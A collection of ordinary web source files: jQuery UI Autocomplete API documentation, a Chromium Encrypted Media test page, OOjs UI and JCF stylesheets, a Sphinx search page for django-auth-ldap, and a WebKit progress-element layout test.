<li>A request object, with a single property called "term", which refers to the value currently in the text input. For example, when the user entered "new yo" in a city field, the Autocomplete term will equal "new yo".</li>
<li>A response callback, which expects a single argument to contain the data to suggest to the user. This data should be filtered based on the provided term, and can be in any of the formats described above for simple local data (String-Array or Object-Array with label/value/both properties).</li>
</ul>
<p>The demos all focus on different variations of the source-option - look for the one that matches your use case, and take a look at the code.</p>
</div>
<div id="overview-dependencies">
<h3>Dependencies</h3>
<ul>
<li>UI Core</li>
<li>UI Widget</li>
<li>UI Position</li>
</ul>
</div>
<div id="overview-example">
<h3>Example</h3>
<div id="overview-example" class="example">
<ul><li><a href="#demo"><span>Demo</span></a></li><li><a href="#source"><span>View Source</span></a></li></ul>
<p><div id="demo" class="tabs-container" rel="300">
A simple jQuery UI Autocomplete.<br />
</p>
<pre>$("input#autocomplete").autocomplete({
source: ["c++", "java", "php", "coldfusion", "javascript", "asp", "ruby"]
});
</pre>
<p></div><div id="source" class="tabs-container">
</p>
<pre><!DOCTYPE html>
<html>
<head>
<link href="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8/themes/base/jquery-ui.css" rel="stylesheet" type="text/css"/>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js"></script>
<script>
$(document).ready(function() {
$("input#autocomplete").autocomplete({
source: ["c++", "java", "php", "coldfusion", "javascript", "asp", "ruby"]
});
});
</script>
</head>
<body style="font-size:62.5%;">
<input id="autocomplete" />
</body>
</html>
</pre>
<p></div>
</p><p></div>
</div>
</div>
<div id="options">
<h2 class="top-header">Options</h2>
<ul class="options-list">
<li class="option" id="option-disabled">
<div class="option-header">
<h3 class="option-name"><a href="#option-disabled">disabled</a></h3>
<dl>
<dt class="option-type-label">Type:</dt>
<dd class="option-type">Boolean</dd>
<dt class="option-default-label">Default:</dt>
<dd class="option-default">false</dd>
</dl>
</div>
<div class="option-description">
<p>Disables (true) or enables (false) the autocomplete. Can be set when initialising (first creating) the autocomplete.</p>
</div>
<div class="option-examples">
<h4>Code examples</h4>
<dl class="option-examples-list">
<dt>
Initialize a autocomplete with the <code>disabled</code> option specified.
</dt>
<dd>
<pre><code>$( ".selector" ).autocomplete({ disabled: true });</code></pre>
</dd>
<dt>
Get or set the <code>disabled</code> option, after init.
</dt>
<dd>
<pre><code>//getter
var disabled = $( ".selector" ).autocomplete( "option", "disabled" );
//setter
$( ".selector" ).autocomplete( "option", "disabled", true );</code></pre>
</dd>
</dl>
</div>
</li>
<li class="option" id="option-delay">
<div class="option-header">
<h3 class="option-name"><a href="#option-delay">delay</a></h3>
<dl>
<dt class="option-type-label">Type:</dt>
<dd class="option-type">Integer</dd>
<dt class="option-default-label">Default:</dt>
<dd class="option-default">300</dd>
</dl>
</div>
<div class="option-description">
<p>The delay in milliseconds the Autocomplete waits after a keystroke to activate itself. A zero-delay makes sense for local data (more responsive), but can produce a lot of load for remote data, while being less responsive.</p>
</div>
<div class="option-examples">
<h4>Code examples</h4>
<dl class="option-examples-list">
<dt>
Initialize a autocomplete with the <code>delay</code> option specified.
</dt>
<dd>
<pre><code>$( ".selector" ).autocomplete({ delay: 0 });</code></pre>
</dd>
<dt>
Get or set the <code>delay</code> option, after init.
</dt>
<dd>
<pre><code>//getter
var delay = $( ".selector" ).autocomplete( "option", "delay" );
//setter
$( ".selector" ).autocomplete( "option", "delay", 0 );</code></pre>
</dd>
</dl>
</div>
</li>
<li class="option" id="option-minLength">
<div class="option-header">
<h3 class="option-name"><a href="#option-minLength">minLength</a></h3>
<dl>
<dt class="option-type-label">Type:</dt>
<dd class="option-type">Integer</dd>
<dt class="option-default-label">Default:</dt>
<dd class="option-default">1</dd>
</dl>
</div>
<div class="option-description">
<p>The minimum number of characters a user has to type before the Autocomplete activates. Zero is useful for local data with just a few items. Should be increased when there are a lot of items, where a single character would match a few thousand items.</p>
</div>
<div class="option-examples">
<h4>Code examples</h4>
<dl class="option-examples-list">
<dt>
Initialize a autocomplete with the <code>minLength</code> option specified.
</dt>
<dd>
<pre><code>$( ".selector" ).autocomplete({ minLength: 0 });</code></pre>
</dd>
<dt>
Get or set the <code>minLength</code> option, after init.
</dt>
<dd>
<pre><code>//getter
var minLength = $( ".selector" ).autocomplete( "option", "minLength" );
//setter
$( ".selector" ).autocomplete( "option", "minLength", 0 );</code></pre>
</dd>
</dl>
</div>
</li>
<li class="option" id="option-source">
<div class="option-header">
<h3 class="option-name"><a href="#option-source">source</a></h3>
<dl>
<dt class="option-type-label">Type:</dt>
<dd class="option-type">String, Array, Callback</dd>
<dt class="option-default-label">Default:</dt>
<dd class="option-default">none, must be specified</dd>
</dl>
</div>
<div class="option-description">
<p>Defines the data to use, must be specified. See Overview section for more details, and look at the various demos.
</p>
</div>
<div class="option-examples">
<h4>Code examples</h4>
<dl class="option-examples-list">
<dt>
Initialize a autocomplete with the <code>source</code> option specified.
</dt>
<dd>
<pre><code>$( ".selector" ).autocomplete({ source: ["c++", "java", "php", "coldfusion", "javascript", "asp", "ruby"] });</code></pre>
</dd>
<dt>
Get or set the <code>source</code> option, after init.
</dt>
<dd>
<pre><code>//getter
var source = $( ".selector" ).autocomplete( "option", "source" );
//setter
$( ".selector" ).autocomplete( "option", "source", ["c++", "java", "php", "coldfusion", "javascript", "asp", "ruby"] );</code></pre>
</dd>
</dl>
</div>
</li>
</ul>
</div>
<div id="events">
<h2 class="top-header">Events</h2>
<ul class="events-list">
<li class="event" id="event-search">
<div class="event-header">
<h3 class="event-name"><a href="#event-search">search</a></h3>
<dl>
<dt class="event-type-label">Type:</dt>
<dd class="event-type">autocompletesearch</dd>
</dl>
</div>
<div class="event-description">
<p>Before a request (source-option) is started, after minLength and delay are met. Can be canceled (return false), then no request will be started and no items suggested.</p>
</div>
<div class="event-examples">
<h4>Code examples</h4>
<dl class="event-examples-list">
<dt>
Supply a callback function to handle the <code>search</code> event as an init option.
</dt>
<dd>
<pre><code>$( ".selector" ).autocomplete({
search: function(event, ui) { ... }
});</code></pre>
</dd>
<dt>
Bind to the <code>search</code> event by type: <code>autocompletesearch</code>.
</dt>
<dd>
<pre><code>$( ".selector" ).bind( "autocompletesearch", function(event, ui) {
...
});</code></pre>
</dd>
</dl>
</div>
</li>
<li class="event" id="event-open">
<div class="event-header">
<h3 class="event-name"><a href="#event-open">open</a></h3>
<dl>
<dt class="event-type-label">Type:</dt>
<dd class="event-type">autocompleteopen</dd>
</dl>
</div>
<div class="event-description">
<p>Triggered when the suggestion menu is opened.</p>
</div>
<div class="event-examples">
<h4>Code examples</h4>
<dl class="event-examples-list">
<dt>
Supply a callback function to handle the <code>open</code> event as an init option.
</dt>
<dd>
<pre><code>$( ".selector" ).autocomplete({
open: function(event, ui) { ... }
});</code></pre>
</dd>
<dt>
Bind to the <code>open</code> event by type: <code>autocompleteopen</code>.
</dt>
<dd>
<pre><code>$( ".selector" ).bind( "autocompleteopen", function(event, ui) {
...
});</code></pre>
</dd>
</dl>
</div>
</li>
<li class="event" id="event-focus">
<div class="event-header">
<h3 class="event-name"><a href="#event-focus">focus</a></h3>
<dl>
<dt class="event-type-label">Type:</dt>
<dd class="event-type">autocompletefocus</dd>
</dl>
</div>
<div class="event-description">
<p>Before focus is moved to an item (not selecting), ui.item refers to the focused item. The default action of focus is to replace the text field's value with the value of the focused item, though only if the focus event was triggered by a keyboard interaction. Canceling this event prevents the value from being updated, but does not prevent the menu item from being focused.</p>
</div>
<div class="event-examples">
<h4>Code examples</h4>
<dl class="event-examples-list">
<dt>
Supply a callback function to handle the <code>focus</code> event as an init option.
</dt>
<dd>
<pre><code>$( ".selector" ).autocomplete({
focus: function(event, ui) { ... }
});</code></pre>
</dd>
<dt>
Bind to the <code>focus</code> event by type: <code>autocompletefocus</code>.
</dt>
<dd>
<pre><code>$( ".selector" ).bind( "autocompletefocus", function(event, ui) {
...
});</code></pre>
</dd>
</dl>
</div>
</li>
<li class="event" id="event-select">
<div class="event-header">
<h3 class="event-name"><a href="#event-select">select</a></h3>
<dl>
<dt class="event-type-label">Type:</dt>
<dd class="event-type">autocompleteselect</dd>
</dl>
</div>
<div class="event-description">
<p>Triggered when an item is selected from the menu; ui.item refers to the selected item. The default action of select is to replace the text field's value with the value of the selected item. Canceling this event prevents the value from being updated, but does not prevent the menu from closing.</p>
</div>
<div class="event-examples">
<h4>Code examples</h4>
<dl class="event-examples-list">
<dt>
Supply a callback function to handle the <code>select</code> event as an init option.
</dt>
<dd>
<pre><code>$( ".selector" ).autocomplete({
select: function(event, ui) { ... }
});</code></pre>
</dd>
<dt>
Bind to the <code>select</code> event by type: <code>autocompleteselect</code>.
</dt>
<dd>
<pre><code>$( ".selector" ).bind( "autocompleteselect", function(event, ui) {
...
});</code></pre>
</dd>
</dl>
</div>
</li>
<li class="event" id="event-close">
<div class="event-header">
<h3 class="event-name"><a href="#event-close">close</a></h3>
<dl>
<dt class="event-type-label">Type:</dt>
<dd class="event-type">autocompleteclose</dd>
</dl>
</div>
<div class="event-description">
<p>When the list is hidden - doesn't have to occur together with a change.</p>
</div>
<div class="event-examples">
<h4>Code examples</h4>
<dl class="event-examples-list">
<dt>
Supply a callback function to handle the <code>close</code> event as an init option.
</dt>
<dd>
<pre><code>$( ".selector" ).autocomplete({
close: function(event, ui) { ... }
});</code></pre>
</dd>
<dt>
Bind to the <code>close</code> event by type: <code>autocompleteclose</code>.
</dt>
<dd>
<pre><code>$( ".selector" ).bind( "autocompleteclose", function(event, ui) {
...
});</code></pre>
</dd>
</dl>
</div>
</li>
<li class="event" id="event-change">
<div class="event-header">
<h3 class="event-name"><a href="#event-change">change</a></h3>
<dl>
<dt class="event-type-label">Type:</dt>
<dd class="event-type">autocompletechange</dd>
</dl>
</div>
<div class="event-description">
<p>After an item was selected; ui.item refers to the selected item. Always triggered after the close event.</p>
</div>
<div class="event-examples">
<h4>Code examples</h4>
<dl class="event-examples-list">
<dt>
Supply a callback function to handle the <code>change</code> event as an init option.
</dt>
<dd>
<pre><code>$( ".selector" ).autocomplete({
change: function(event, ui) { ... }
});</code></pre>
</dd>
<dt>
Bind to the <code>change</code> event by type: <code>autocompletechange</code>.
</dt>
<dd>
<pre><code>$( ".selector" ).bind( "autocompletechange", function(event, ui) {
...
});</code></pre>
</dd>
</dl>
</div>
</li>
</ul>
</div>
<div id="methods">
<h2 class="top-header">Methods</h2>
<ul class="methods-list">
<li class="method" id="method-destroy">
<div class="method-header">
<h3 class="method-name"><a href="#method-destroy">destroy</a></h3>
<dl>
<dt class="method-signature-label">Signature:</dt>
<dd class="method-signature">.autocomplete( "destroy"
)</dd>
</dl>
</div>
<div class="method-description">
<p>Remove the autocomplete functionality completely. This will return the element back to its pre-init state.</p>
</div>
</li>
<li class="method" id="method-disable">
<div class="method-header">
<h3 class="method-name"><a href="#method-disable">disable</a></h3>
<dl>
<dt class="method-signature-label">Signature:</dt>
<dd class="method-signature">.autocomplete( "disable"
)</dd>
</dl>
</div>
<div class="method-description">
<p>Disable the autocomplete.</p>
</div>
</li>
<li class="method" id="method-enable">
<div class="method-header">
<h3 class="method-name"><a href="#method-enable">enable</a></h3>
<dl>
<dt class="method-signature-label">Signature:</dt>
<dd class="method-signature">.autocomplete( "enable"
)</dd>
</dl>
</div>
<div class="method-description">
<p>Enable the autocomplete.</p>
</div>
</li>
<li class="method" id="method-option">
<div class="method-header">
<h3 class="method-name"><a href="#method-option">option</a></h3>
<dl>
<dt class="method-signature-label">Signature:</dt>
<dd class="method-signature">.autocomplete( "option"
, optionName
, <span class="optional">[</span>value<span class="optional">] </span>
)</dd>
</dl>
</div>
<div class="method-description">
<p>Get or set any autocomplete option. If no value is specified, will act as a getter.</p>
</div>
</li>
<li class="method" id="method-option">
<div class="method-header">
<h3 class="method-name"><a href="#method-option">option</a></h3>
<dl>
<dt class="method-signature-label">Signature:</dt>
<dd class="method-signature">.autocomplete( "option"
, options
)</dd>
</dl>
</div>
<div class="method-description">
<p>Set multiple autocomplete options at once by providing an options object.</p>
</div>
</li>
<li class="method" id="method-widget">
<div class="method-header">
<h3 class="method-name"><a href="#method-widget">widget</a></h3>
<dl>
<dt class="method-signature-label">Signature:</dt>
<dd class="method-signature">.autocomplete( "widget"
)</dd>
</dl>
</div>
<div class="method-description">
<p>Returns the .ui-autocomplete element.</p>
</div>
</li>
<li class="method" id="method-search">
<div class="method-header">
<h3 class="method-name"><a href="#method-search">search</a></h3>
<dl>
<dt class="method-signature-label">Signature:</dt>
<dd class="method-signature">.autocomplete( "search"
, <span class="optional">[</span>value<span class="optional">] </span>
)</dd>
</dl>
</div>
<div class="method-description">
<p>Triggers a search event, which, when data is available, then will display the suggestions; can be used by a selectbox-like button to open the suggestions when clicked. If no value argument is specified, the current input's value is used. Can be called with an empty string and minLength: 0 to display all items.</p>
</div>
</li>
<li class="method" id="method-close">
<div class="method-header">
<h3 class="method-name"><a href="#method-close">close</a></h3>
<dl>
<dt class="method-signature-label">Signature:</dt>
<dd class="method-signature">.autocomplete( "close"
)</dd>
</dl>
</div>
<div class="method-description">
<p>Close the Autocomplete menu. Useful in combination with the search method, to close the open menu.</p>
</div>
</li>
</ul>
</div>
<div id="theming">
<h2 class="top-header">Theming</h2>
<p>The jQuery UI Autocomplete plugin uses the jQuery UI CSS Framework to style its look and feel, including colors and background textures. We recommend using the ThemeRoller tool to create and download custom themes that are easy to build and maintain.
</p>
<p>If a deeper level of customization is needed, there are widget-specific classes referenced within the jquery.ui.autocomplete.css stylesheet that can be modified. These classes are highlighed in bold below.
</p>
<h3>Sample markup with jQuery UI CSS Framework classes</h3>
<input class="ui-autocomplete-input"/><br />
<ul class="ui-autocomplete ui-menu ui-widget ui-widget-content ui-corner-all"><br />
<li class="ui-menu-item"><br />
<a class="ui-corner-all">item 1</a><br />
</li><br />
<li class="ui-menu-item"><br />
<a class="ui-corner-all">item 2</a><br />
</li><br />
<li class="ui-menu-item"><br />
<a class="ui-corner-all">item 3</a><br />
</li><br />
</ul>
<p class="theme-note">
<strong>
Note: This is a sample of markup generated by the autocomplete plugin, not markup you should use to create a autocomplete. The only markup needed for that is <input/>.
</strong>
</p>
</div>
</div>
</p><!--
Pre-expand include size: 29839 bytes
Post-expand include size: 47753 bytes
Template argument size: 26499 bytes
Maximum: 2097152 bytes
-->
<!-- Saved in parser cache with key jqdocs_docs:pcache:idhash:3766-1!1!0!!en!2 and timestamp 20100421092026 -->
|
third_party/blink/web_tests/external/wpt/encrypted-media/drm-check-encryption-scheme.https.html
|
chromium/chromium
|
<!doctype html>
<html>
<head>
<meta charset=utf-8>
<title>Encrypted Media Extensions: Check encryptionScheme with DRM</title>
<link rel="help" href="https://w3c.github.io/encrypted-media/">
<!-- Web Platform Test Harness scripts -->
<script src=/resources/testharness.js></script>
<script src=/resources/testharnessreport.js></script>
<!-- Helper scripts for Encrypted Media Extensions tests -->
<script src=/encrypted-media/util/utils.js></script>
<script src=/encrypted-media/util/utf8.js></script>
<!-- Content metadata -->
<!--<script src=/encrypted-media/content/content-metadata.js></script>-->
<!-- The script for this specific test -->
<script src=/encrypted-media/scripts/check-encryption-scheme.js></script>
</head>
<body>
<div id='log'></div>
<script>
var config = { keysystem: getSupportedKeySystem() }
runTest(config);
</script>
</body>
</html>
|
ajax/libs/oojs-ui/0.9.3/oojs-ui-mediawiki-icons-editing-advanced.raster.rtl.css
|
brix/cdnjs
|
/*!
* OOjs UI v0.9.3
* https://www.mediawiki.org/wiki/OOjs_UI
*
* Copyright 2011–2015 OOjs Team and other contributors.
* Released under the MIT license
* http://oojs.mit-license.org
*
* Date: 2015-03-19T23:19:18Z
*/
.oo-ui-icon-table {
background-image: /* @embed */ url(themes/mediawiki/images/icons/table.png);
}
.oo-ui-icon-newline {
background-image: /* @embed */ url(themes/mediawiki/images/icons/newline-rtl.png);
}
.oo-ui-icon-redirect {
background-image: /* @embed */ url(themes/mediawiki/images/icons/redirect-rtl.png);
}
.oo-ui-icon-noWikiText {
background-image: /* @embed */ url(themes/mediawiki/images/icons/noWikiText-rtl.png);
}
.oo-ui-icon-puzzle {
background-image: /* @embed */ url(themes/mediawiki/images/icons/puzzle-rtl.png);
}
.oo-ui-icon-quotes {
background-image: /* @embed */ url(themes/mediawiki/images/icons/quotes-rtl.png);
}
.oo-ui-icon-quotesAdd {
background-image: /* @embed */ url(themes/mediawiki/images/icons/quotesAdd-rtl.png);
}
.oo-ui-icon-templateAdd {
background-image: /* @embed */ url(themes/mediawiki/images/icons/templateAdd-rtl.png);
}
.oo-ui-icon-translation {
background-image: /* @embed */ url(themes/mediawiki/images/icons/translation-rtl.png);
}
.oo-ui-icon-wikiText {
background-image: /* @embed */ url(themes/mediawiki/images/icons/wikiText.png);
}
|
ajax/libs/jcf/1.0.0/css/theme-minimal/jcf.css
|
sajochiu/cdnjs
|
/* radio */
.jcf-radio {
vertical-align: middle;
display: inline-block;
position: relative;
overflow: hidden;
cursor: default;
background: #fff;
border: 1px solid #777;
border-radius: 9px;
margin: 0 3px 0 0;
height: 16px;
width: 16px;
}
.jcf-radio span{
display:none;
position:absolute;
top:3px;
left:3px;
right:3px;
bottom:3px;
background:#777;
border-radius:100%;
}
.jcf-radio input[type="radio"] {
position: absolute;
height: 100%;
width: 100%;
border: 0;
margin: 0;
left: 0;
top: 0;
}
.jcf-radio.jcf-checked span {display:block;}
/* checkbox */
.jcf-checkbox {
vertical-align: middle;
display: inline-block;
position: relative;
overflow: hidden;
cursor: default;
background: #fff;
border: 1px solid #777;
margin: 0 3px 0 0;
height: 16px;
width: 16px;
}
.jcf-checkbox span{
position:absolute;
display:none;
height:4px;
width:8px;
top:50%;
left:50%;
margin:-7px 0 0 -6px;
border:3px solid #777;
border-width:0 0 3px 3px;
-moz-transform: rotate(-45deg);
-ms-transform: rotate(-45deg);
-webkit-transform: rotate(-45deg);
transform: rotate(-45deg);
-ms-filter: "progid:DXImageTransform.Microsoft.Matrix(M11=0.7071067811865483, M12=0.7071067811865467, M21=-0.7071067811865467, M22=0.7071067811865483, SizingMethod='auto expand')";
}
:root .jcf-checkbox span {margin:-4px 0 0 -5px;}
.jcf-checkbox input[type="checkbox"] {
position: absolute;
width: 100%;
height: 100%;
border: 0;
margin: 0;
left: 0;
top: 0;
}
.jcf-checkbox.jcf-checked span{display:block;}
/* button */
.jcf-button {
display: inline-block;
vertical-align: top;
position: relative;
overflow: hidden;
border: 1px solid #777;
background: #fff;
margin: 0 10px 10px 0;
padding: 5px 10px;
}
.jcf-button .jcf-real-element {
position: absolute;
min-height: 100%;
min-width: 100%;
outline: none;
opacity: 0;
padding: 0;
margin: 0;
border: 0;
bottom: 0;
right: 0;
left: 0;
top: 0;
}
/* file */
.jcf-file {
display: inline-block;
white-space: nowrap;
position: relative;
overflow: hidden;
background: #fff;
}
.jcf-file .jcf-real-element {
position: absolute;
font-size: 200px;
height: 200px;
margin: 0;
right: 0;
top: 0;
}
.jcf-file .jcf-fake-input {
display: inline-block;
text-overflow:ellipsis;
white-space: nowrap;
vertical-align: top;
overflow: hidden;
border: 1px solid #777;
padding: 0 8px;
font-size: 13px;
line-height: 28px;
height: 28px;
width: 125px;
}
.jcf-file .jcf-upload-button {
display: inline-block;
vertical-align: top;
white-space: nowrap;
overflow: hidden;
border: 1px solid #777;
margin: 0 0 0 -1px;
padding: 0 10px;
line-height: 28px;
height: 28px;
}
/* scrollbars */
.jcf-scrollable-wrapper {
box-sizing: content-box;
position: relative;
}
.jcf-scrollbar-vertical {
position: absolute;
cursor: default;
background: #e3e3e3;
width: 14px;
bottom: 0;
right: 0;
top: 0;
}
.jcf-scrollbar-vertical .jcf-scrollbar-dec,
.jcf-scrollbar-vertical .jcf-scrollbar-inc {
background: #bbb;
height: 14px;
width: 14px;
left: 0;
top: 0;
}
.jcf-scrollbar-vertical .jcf-scrollbar-inc {
top: auto;
bottom: 0;
}
.jcf-scrollbar-vertical .jcf-scrollbar-handle {
background: #888;
height: 1px;
width: 14px;
}
.jcf-scrollbar-horizontal {
position: absolute;
background: #e3e3e3;
right: auto;
top: auto;
left: 0;
bottom: 0;
width: 1px;
height: 14px;
}
.jcf-scrollbar-horizontal .jcf-scrollbar-dec,
.jcf-scrollbar-horizontal .jcf-scrollbar-inc {
display: inline-block;
vertical-align: top;
overflow: hidden;
background: #bbb;
height: 14px;
width: 14px;
}
.jcf-scrollbar-horizontal .jcf-scrollbar-inc {
left: auto;
right: 0;
}
.jcf-scrollbar-horizontal .jcf-scrollbar-slider {
display: inline-block;
position: relative;
height: 14px;
}
.jcf-scrollbar-horizontal .jcf-scrollbar-handle {
position: absolute;
background: #888;
height: 14px;
}
.jcf-scrollbar.jcf-inactive .jcf-scrollbar-handle {
visibility: hidden;
}
.jcf-scrollbar.jcf-inactive .jcf-scrollbar-dec,
.jcf-scrollbar.jcf-inactive .jcf-scrollbar-inc {
background: #e3e3e3;
}
/* select */
.jcf-select {
display: inline-block;
vertical-align: top;
position: relative;
border: 1px solid #777;
background: #fff;
margin: 0 0 12px;
min-width: 150px;
height: 26px;
}
.jcf-select select {
z-index: 1;
left: 0;
top: 0;
}
.jcf-select .jcf-select-text {
text-overflow:ellipsis;
white-space: nowrap;
overflow: hidden;
cursor: default;
display: block;
font-size: 13px;
line-height: 26px;
margin: 0 35px 0 8px;
}
.jcf-select .jcf-select-opener {
position: absolute;
text-align: center;
background: #aaa;
width: 26px;
bottom: 0;
right: 0;
top: 0;
}
body > .jcf-select-drop {
position: absolute;
margin: -1px 0 0;
z-index: 9999;
}
body > .jcf-select-drop.jcf-drop-flipped {
margin: 1px 0 0;
}
.jcf-select .jcf-select-drop {
position: absolute;
margin-top: 0px;
z-index: 9999;
top: 100%;
left: -1px;
right: -1px;
}
.jcf-select .jcf-drop-flipped {
bottom: 100%;
top: auto;
}
.jcf-select-drop .jcf-select-drop-content {
border: 1px solid #f00;
}
/* multiple select styles */
.jcf-list-box {
overflow: hidden;
display: inline-block;
border: 1px solid #b8c3c9;
min-width: 200px;
margin: 0 15px;
}
/* select options styles */
.jcf-list {
display: inline-block;
vertical-align: top;
position: relative;
background: #fff;
line-height: 14px;
font-size: 12px;
width: 100%;
}
.jcf-list .jcf-list-content {
vertical-align: top;
display: inline-block;
overflow: auto;
width: 100%;
}
.jcf-list ul {
list-style: none;
padding: 0;
margin: 0;
}
.jcf-list ul li {
overflow: hidden;
display: block;
}
.jcf-list .jcf-overflow {
overflow: auto;
}
.jcf-list .jcf-option {
white-space: nowrap;
overflow: hidden;
cursor: default;
display: block;
padding: 5px 9px;
color: #656565;
height: 1%;
}
.jcf-list .jcf-disabled {
background: #fff !important;
color: #aaa !important;
}
.jcf-select-drop .jcf-hover,
.jcf-list-box .jcf-selected {
background: #e6e6e6;
color: #000;
}
.jcf-list .jcf-optgroup-caption {
white-space: nowrap;
font-weight: bold;
display: block;
padding: 5px 9px;
cursor: default;
color: #000;
}
.jcf-list .jcf-optgroup .jcf-option {
padding-left: 30px;
}
/* other styles */
.jcf-textarea {
border: 1px solid #b8c3c9;
box-sizing: content-box;
display: inline-block;
position: relative;
}
.jcf-textarea .jcf-scrollbar-horizontal {
display: none;
height: 0;
}
.jcf-textarea textarea {
padding: 8px 10px;
border: none;
margin: 0;
}
.jcf-textarea .jcf-resize {
position: absolute;
text-align: center;
cursor: se-resize;
background: #e3e3e3;
font-weight: bold;
line-height: 15px;
text-indent: 1px;
font-size: 12px;
height: 15px;
width: 14px;
bottom: 0;
right: 0;
}
.jcf-textarea .jcf-resize:before {
border: 1px solid #000;
border-width: 0 1px 1px 0;
display: block;
margin: 4px 0 0 3px;
width: 6px;
height: 6px;
content: '';
}
/* number input */
.jcf-number {
display: inline-block;
position: relative;
height: 32px;
}
.jcf-number input {-moz-appearance: textfield;}
.jcf-number input::-webkit-inner-spin-button,
.jcf-number input::-webkit-outer-spin-button {-webkit-appearance: none;}
.jcf-number input {
-webkit-box-sizing: border-box;
-moz-box-sizing: border-box;
box-sizing: border-box;
border: 1px solid #777;
padding: 3px 27px 3px 7px;
margin: 0;
height: 100%;
}
.jcf-number .jcf-btn-dec,
.jcf-number .jcf-btn-inc {
position: absolute;
background: #aaa;
width: 20px;
height: 15px;
right: 1px;
top: 1px;
}
.jcf-number .jcf-btn-dec {
top: auto;
bottom: 1px;
}
.jcf-number .jcf-btn-dec:hover,
.jcf-number .jcf-btn-inc:hover {
background: #e6e6e6;
}
.jcf-number.jcf-disabled .jcf-btn-dec:hover,
.jcf-number.jcf-disabled .jcf-btn-inc:hover {
background: #aaa;
}
.jcf-number .jcf-btn-dec:before,
.jcf-number .jcf-btn-inc:before {
position: absolute;
content: '';
width: 0;
height: 0;
top: 50%;
left: 50%;
margin: -6px 0 0 -4px;
border: 4px solid #aaa;
border-color: transparent transparent #000 transparent;
}
.jcf-number .jcf-btn-dec:before {
margin: -1px 0 0 -4px;
border-color: #000 transparent transparent transparent;
}
.jcf-number.jcf-disabled .jcf-btn-dec:before,
.jcf-number.jcf-disabled .jcf-btn-inc:before,
.jcf-number .jcf-btn-dec.jcf-disabled:before,
.jcf-number .jcf-btn-inc.jcf-disabled:before {
opacity: 0.3;
}
.jcf-number.jcf-disabled input {
background: #ddd;
}
/* range input */
.jcf-range {
display: inline-block;
min-width: 200px;
margin: 0 10px;
width: 130px;
}
.jcf-range .jcf-range-track {
margin: 0 20px 0 0;
position: relative;
display: block;
}
.jcf-range .jcf-range-wrapper {
background: #e5e5e5;
border-radius: 5px;
display: block;
margin: 5px 0;
height: 10px;
}
.jcf-range.jcf-vertical {
min-width: 0;
width: auto;
}
.jcf-range.jcf-vertical .jcf-range-wrapper {
margin: 0;
width: 10px;
height: auto;
padding: 20px 0 0;
}
.jcf-range.jcf-vertical .jcf-range-track {
height: 180px;
width: 10px;
}
.jcf-range.jcf-vertical .jcf-range-handle {
left: -5px;
top: auto;
}
.jcf-range .jcf-range-handle {
position: absolute;
background: #aaa;
border-radius: 19px;
width: 19px;
height: 19px;
margin: -4px 0 0;
z-index: 1;
top: 0;
left: 0;
}
.jcf-range .jcf-range-mark {
position: absolute;
overflow: hidden;
background: #000;
width: 1px;
height: 3px;
top: -7px;
margin: 0 0 0 9px;
}
.jcf-range.jcf-vertical .jcf-range-mark {
margin: 0 0 9px;
left: 14px;
top: auto;
width: 3px;
height: 1px;
}
.jcf-range.jcf-focus .jcf-range-handle {
border: 1px solid #f00;
margin: -5px 0 0 -1px;
}
.jcf-range.jcf-disabled {
background: none !important;
opacity: 0.3;
}
/* common styles */
.jcf-disabled {background: #ddd !important;}
.jcf-focus, .jcf-focus * {border-color: #f00 !important;}
|
hue-3.8.1-bluemix/desktop/core/ext-py/django-auth-ldap-1.2.0/docs/archive/versions/1.0.19/search.html
|
vmanoria/bluemix-hue-filebrowser
|
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Search — django-auth-ldap 1.0.19 documentation</title>
<link rel="stylesheet" href="_static/default.css" type="text/css" />
<link rel="stylesheet" href="_static/pygments.css" type="text/css" />
<script type="text/javascript">
var DOCUMENTATION_OPTIONS = {
URL_ROOT: '',
VERSION: '1.0.19',
COLLAPSE_INDEX: false,
FILE_SUFFIX: '.html',
HAS_SOURCE: true
};
</script>
<script type="text/javascript" src="_static/jquery.js"></script>
<script type="text/javascript" src="_static/underscore.js"></script>
<script type="text/javascript" src="_static/doctools.js"></script>
<script type="text/javascript" src="_static/searchtools.js"></script>
<link rel="top" title="django-auth-ldap 1.0.19 documentation" href="index.html" />
<script type="text/javascript">
jQuery(function() { Search.loadIndex("searchindex.js"); });
</script>
</head>
<body>
<div class="related">
<h3>Navigation</h3>
<ul>
<li class="right" style="margin-right: 10px">
<a href="genindex.html" title="General Index"
accesskey="I">index</a></li>
<li class="right" >
<a href="py-modindex.html" title="Python Module Index"
>modules</a> |</li>
<li><a href="index.html">django-auth-ldap 1.0.19 documentation</a> »</li>
</ul>
</div>
<div class="document">
<div class="documentwrapper">
<div class="bodywrapper">
<div class="body">
<h1 id="search-documentation">Search</h1>
<div id="fallback" class="admonition warning">
<script type="text/javascript">$('#fallback').hide();</script>
<p>
Please activate JavaScript to enable the search
functionality.
</p>
</div>
<p>
From here you can search these documents. Enter your search
words into the box below and click "search". Note that the search
function will automatically search for all of the words. Pages
containing fewer words won't appear in the result list.
</p>
<form action="" method="get">
<input type="text" name="q" value="" />
<input type="submit" value="search" />
<span id="search-progress" style="padding-left: 10px"></span>
</form>
<div id="search-results">
</div>
</div>
</div>
</div>
<div class="sphinxsidebar">
<div class="sphinxsidebarwrapper">
</div>
</div>
<div class="clearer"></div>
</div>
<div class="related">
<h3>Navigation</h3>
<ul>
<li class="right" style="margin-right: 10px">
<a href="genindex.html" title="General Index"
>index</a></li>
<li class="right" >
<a href="py-modindex.html" title="Python Module Index"
>modules</a> |</li>
<li><a href="index.html">django-auth-ldap 1.0.19 documentation</a> »</li>
</ul>
</div>
<div class="footer">
© Copyright 2009, Peter Sagerson.
Created using <a href="http://sphinx.pocoo.org/">Sphinx</a> 1.1.3.
</div>
</body>
</html>
|
third_party/WebKit/LayoutTests/fast/dom/HTMLProgressElement/progress-writing-mode.html
|
hujiajie/chromium-crosswalk
|
<html>
<head>
<style>
progress {
width: 50px;
height: 50px;
-webkit-appearance: none;
background-color: red; /* should not be visible */
}
</style>
</head>
<body>
<progress min=0 value=30 max=100 style="-webkit-writing-mode: vertical-lr;"></progress>
<progress min=0 value=30 max=100 style="-webkit-writing-mode: vertical-rl;"></progress>
